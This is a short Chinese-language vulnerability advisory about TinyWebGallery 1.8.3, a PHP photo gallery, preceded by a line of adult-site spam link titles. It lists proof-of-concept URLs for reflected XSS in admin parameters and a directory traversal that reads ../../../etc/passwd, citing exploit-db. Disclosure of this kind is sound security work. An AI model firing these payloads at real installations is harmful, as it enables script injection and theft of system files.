自拍无码在线|亚洲AvAv国产|手机久草视频在线|国产三区四区视频|日夲強伦一级入口|欧美香蕉视频一区二区|亚洲涩图日本五月|最新免费成人网址|超碰91官网在线观看|国产口爆在线观看

TinyWebGallery 1.8.3版多個(gè)安全漏洞漏洞預(yù)警 -電腦資料

電腦資料 時(shí)間:2019-01-01 我要投稿
【www.zwdianwu.cn - 電腦資料】

   

    TinyWebGallery是一款php相冊(cè)程序,TinyWebGallery 1.8.3中包含多個(gè)安全漏洞,包括目錄遍歷和XSS,可能導(dǎo)致敏感信息泄露,

TinyWebGallery 1.8.3版多個(gè)安全漏洞漏洞預(yù)警

。

    [+]info:

    ~~~~~~~~~

    Script. TinyWebGallery

    Version: 1.8.3 (No fixes yet, might work on other versions too).

    Home: http://www.tinywebgallery.com

    [+]poc:

    ~~~~~~~~~

    http://localhost/twg183/admin/index.php?sview="onmouseover=alert(String.fromCharCode(88,83,83));"

    http://localhost/twg183/admin/index.php?tview="onmouseover=alert(String.fromCharCode(88,83,83));"

    http://localhost/twg183/admin/index.php?dir=

    http://localhost/twg183/admin/index.php?action=chmod&item=

    http://localhost/twg183/twg183/admin/index.php?action=chmod&item=">

    http://localhost/twg183/admin/index.php?action=edit&item=../../../etc/passwd

    [+]Reference:

    ~~~~~~~~~

    http://www.exploit-db.com/exploits/16090

最新文章